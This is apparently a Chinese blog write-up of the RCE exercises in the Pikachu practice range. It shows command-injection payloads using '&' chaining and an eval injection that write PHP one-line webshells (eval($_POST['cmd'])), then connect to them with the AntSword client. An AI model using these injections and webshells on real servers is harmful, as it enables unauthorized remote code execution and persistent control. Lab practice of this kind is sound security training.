Pikachu靶场之RCE漏洞详解

2407-2 shw2024-09-08 16:15

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
行业探路者3 分钟前
资产标识二维码的高效管理与模板重新生成策略
大数据·人工智能·安全·二维码·设备巡检
金牌归来发现妻女流落街头6 分钟前
【线程池 + Socket 服务器】
java·运维·服务器·多线程
牛奶咖啡136 分钟前
Linux文件快照备份工具rsnapshot的实践教程
linux·服务器·文件备份·文件快照备份·rsnapshot·定时备份本地或远程文件·查看指定命令的完整路径
大模型铲屎官7 分钟前
【操作系统-Day 47】揭秘Linux文件系统基石:图解索引分配(inode)与多级索引
linux·运维·服务器·人工智能·python·操作系统·计算机组成原理
乾元16 分钟前
Network-as-Code:把 HCIE / CCIE 实验脚本转为企业级 CI 工程化流程
运维·网络·人工智能·安全·web安全·ai·架构
拾光Ծ19 分钟前
Linux 进程控制:进程终止与等待・waitpid 选项参数与状态解析(告别僵尸进程)
linux·运维·服务器·进程控制
2501_9307992424 分钟前
vllm部署时的nginx 配置
运维·nginx·vllm
linux修理工24 分钟前
ubuntu 2204 tsinghua
linux·运维·ubuntu
琥珀.25 分钟前
查看linux下java服务进程是否正常
java·linux·运维
oMcLin26 分钟前
Ubuntu 22.04 无法安装依赖包:解决 apt‑get 错误“Could not resolve”
linux·运维·ubuntu
热门推荐
01GitHub 镜像站点02jdk21下载、安装(Windows、Linux、macOS)03Linux下V2Ray安装配置指南04Claude Code Skills 实用使用手册05UV安装并设置国内源06手把手教你通过Gemini3 pro 学生认证,白用一年,手慢无!07从快手“12·22”直播攻击事件看:一次教科书式的业务层饱和攻击082025 最新教程:注册并切换到美区 Apple ID09【踩坑笔记】50系显卡适配的 PyTorch 安装10祝大家 2026 年新年快乐,代码无 bug,需求一次过